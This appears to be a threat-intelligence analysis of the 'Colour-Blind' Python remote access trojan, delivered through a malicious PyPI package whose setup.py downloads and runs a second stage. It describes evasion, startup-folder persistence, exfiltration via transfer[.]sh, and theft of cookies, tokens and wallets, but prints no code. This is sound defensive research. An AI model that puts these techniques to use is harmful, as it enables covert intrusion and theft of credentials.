PyPI Packages Used to Deliver Python Remote Access Tools

Key Takeaways

• Kroll has identified a fully featured information stealer and remote access tool (RAT) in the Python Package Index (PyPI) that it is calling “Colour-Blind”.
• The malicious package was found as part of a project to obtain more awareness of initial attack vectors and uses a tool developed by Kroll’s threat intelligence team.
• The “Colour-Blind” malware points to the democratization of cybercrime that could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others.

Summary

As part of a project to obtain more awareness of initial attack vectors outside of the common phishing and web application exploitation, Kroll’s Cyber Threat Intelligence team has developed a tool to enable the enhanced monitoring of the Python Package Index (PyPI) to find and obtain malicious packages that are added to it.

We have discovered several packages with varying degrees of sophistication. In the following article, we analyze one of the more interesting malicious packages uncovered named “Colour-Blind” by Kroll. Colour-Blind is a fully featured information stealer and remote access tool (RAT) written in Python. In our research, we present a detailed analysis of the functionality and an assessment of the skill level of the actors who have created the malware.

Initial “Colourfool” Discovery

The package “colourfool” was detected by our tool, and a copy was archived for manual inspection shortly after it was uploaded to PyPI.

The package contained only one Python file of note, a suspiciously large “setup.py” last modified four days earlier.

Figure 1 - Malicious Package Files and Meta Data

The sole purpose of the script seemed to be downloading a file from the internet, hiding from the user and executing it. The function, therefore, immediately seemed suspicious and likely malicious.

Figure 2 – Second Stage Download and Execution

The function that provided the URL for download was also suspicious. It attempted to get a URL from a pastebin[.]com snippet and failing this returned a hardcoded discord content delivery network URL. Within a legitimate library, the use of hardcoded URLs for downloading executable resources “on the fly” is uncommon. This is particularly true when those URLs aren’t persistent and unlikely to be reachable after a short period of time.

Figure 3 – Calculation of Second Stage URL

Other suspicious aspects of this script were the redirection of the standard out process to a “null device,” and the copying of the downloaded file into the same directory in which the interpreter “python.exe” resides. The copy functionality is preceded by a check, resulting in a forced exit if the file already exists. This is a common method the malware uses to avoid reinfection.

The second stage archive contained only one file “code.py” which was significantly larger than the script analyzed above; this new file was over 300 kilobytes (KB) and 2,038 lines of code.

Figure 4 – Second Stage Meta Data

The new script contains a much larger imports section, including modules that enable malicious activity in the form of keylogging or stealing cookies.

Figure 5 – Imports Section Showing Modules for Lower-Level Access

On looking through the code, some of it is blatantly malicious, for example, a function named “disable_antivirus” where the code attempts to add its location to the Microsoft Defender Antivirus exclusion path in Windows.

Figure 6 – Overtly Malicious Function Name

Defense Evasion Behavior

In some other parts of the code, some attempt at obfuscation was made, although it mostly amounted to variables named with a simple pattern that contained only two characters. This was easy to turn “human readable” by utilizing a regular expression.

Figure 7 – Obfuscated Variable Names

The combination of obfuscation alongside blatant malicious code indicates that it is unlikely that all the code was developed by a single entity. It is possible that the final developer mostly utilized other people’s code, adding it via copy and paste.

This is a similar function for obtaining a URL to that of the original script, however, in this second stage, the Pastebin snippet was encrypted.

Figure 8 –Similar Function to Figure 3, However, a Decryption Routine is Now Present

The key for decrypting this URL was hardcoded in the script, enabling us to obtain the following domain: “clearstride[.]io”.

SSL information for this domain indicates that the certificate was created on the same date as the original “setup.py”  script.

Figure 9 – SSL/TLS Certificate for C2 Domain

The malware starts with a call to an external website to retrieve geolocation and other IP- related information.

Figure 10 – Code for Obtaining Public IP Address Information of Victim Host

A function that looks for indications of running inside a virtual machine is then called.

Figure 11 – Code for Detection Virtualization Technologies

The final lookup is for the presence of any security research tools running in the system process list.

Figure 12 – Security Tool Search

Typically, this kind of defense evasion behavior is commonly seen where the actor is checking to make sure that the malicious code is not running in an automated security sandbox, to avoid it being identified as malicious. In this case, however, after the malware gets the information, it does nothing with most of it. For example, the result from the security research tool search is never referenced or checked. This behavior adds strength to the hypothesis that the code has been plagiarized from multiple sources, and the final developer might not be particularly sophisticated in their methods.

Following this, the code tries to protect itself by using a combination of two functions to terminate processes it deems a threat. The first function is solely dedicated to killing Windows Task Manager.

Figure 13 – Task Manger Kill Code

The second termination function loops through running processes and kills them based on the presence of hardcoded strings within the window’s text.

Figure 14 – Code to Find and Terminate Processes Based on Identifying Strings

Establishing Persistence

The persistence mechanism the malware uses is to add a Visual Basic (VB) script named “Essentials.vbs” to the “Start Up” folder within the user’s “Start Menu”. The VB script runs a Windows batch file that the malware places in the same folder as “python.exe”. This batch file will start the malware using Python every time the user logs in.

The malware’s function for file exfiltration utilizes “transfer[.]sh,” an anonymous file transfer website that seems to be becoming popular amongst threat actors.

Figure 15 – Data Exfiltration

There appears to be some code related to social engineering, generating an error message trying to persuade the user to re-run as administrator. There is also an embedded “Snake” game that appears to be a direct copy of the code from a GitHub repository. This game doesn’t seem to serve a purpose and didn’t start when the malware was run during testing. This could be another artifact indicating the irregular sourcing of this code.

Figure 16 – Social Engineering Present Within the Source Code

The malware triggers multiple subprocesses, including threads for cookies, passwords and cryptocurrency wallet theft.

Figure 17 – Multithreading Code

As a method of remote control, the malware starts a Flask web application, which it makes accessible to the internet via Cloudflare’s reverse tunnel utility “cloudflared,” bypassing any inbound firewall rules.

Colour-Blind Remote Access Tool (RAT) Functionality

The web application serves as a control panel for the malware, and the available options indicate functionality of a Remote Access Trojan (RAT). The web code for this page is basic and looks somewhat childish in aesthetic, giving rise to our tracking name for this malware “Colour-Blind,” based on the original PyPI package name (“colourfool”) and design choices made here.

Figure 18 – Screenshot of the Malware Command Panel

The functionality of the RAT accessible from the control interface includes:

• Tokens: Dumps to the screen login tokens for several application that use chromium via electron.io or chromium directly as an application framework, a notable example being Discord.
• Passwords: Dumps passwords extracted from web browsers to screen
• Cookies: Dumps all browser cookies to screen
• Keys: Dumps to key loggers captured data to screen
• Applications: Provides a list of running applications and a button to terminate them
• Data Dump: Sends all captured data to the C2 URL
• Screen: Shows screenshot of the user desktop and allows for rudimentary interaction such as key presses
• IP: Looks up IP information and displays it to screen (using a different function to earlier)
• Open Browser: Opens a browser to a given webpage
• Run: Runs a command via operating system
• Text Input: Sends keystroke to the machine
• Phantom/Metamask: Steals cryptocurrency wallet information

Figure 19 – Screenshot of Remote Desktop Viewing Functionality

Figure 20 – Process Terminate Panel

Figure 21 – Real-Time Key Logger

Figure 22 – The RAT running and accessible via Cloudflare Tunnel

We further examined the code and extracted all the endpoints of the web application and found several that were not linked from the interface.

Figure 23 – List of all Web Application Endpoints

The /camera endpoint allows the attacker to spy on an unsuspecting user via a web camera.

Figure 24 – Web Camera functionality being used to Snoop

There is also a series of endpoints starting with the letters “hvnc,” which deal with a hidden desktop created on the victim’s machine. “/hvncmanager” allows for the starting of a web browser on this hidden desktop.

Figure 25 – Opening of Chrome Web Browser on Hidden Desktop and not Visible to User

“/hvnc” will open the hidden desktop allowing for the threat actor to interact with it via a mouse and keyboard. The ability to open a web browser in a hidden manner allows the threat actor to interact with the victim’s internet accounts, even those which lock a session cookie to an IP address or other unique host identifiers.

Figure 26 – Screenshot of Chrome running inside the Hidden Desktop Visible to Actor

“/hvncitem” enables custom commands to be executed on the hidden desktop via manipulation of the URL parameter “start”.

Figure 27 – Triggering a Process Start Via Manually Manipulating a Request to Malware

Figure 28 – Manually Triggered Process Being Run on Hidden Desktop

What Colour-Blind Tells Us

From analysis of the Colour-Blind malware, it is evident that this RAT has a lot of interesting features. It shows us how the common functionality of malware can easily be written in modern languages such as Python. This malware also provides insights into how the democratization of cybercrime could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others. As such, Kroll will continue to monitor open-source language repositories for further malware strains to enable further detection opportunities.

Kroll Recommendations

• Ensure that all imported libraries are verified by developers
• Consider using deployment processes that sandbox build targets before they are pushed to production
• Use virtualized environments for development tasks that can be rapidly rebuilt should a malicious package be installed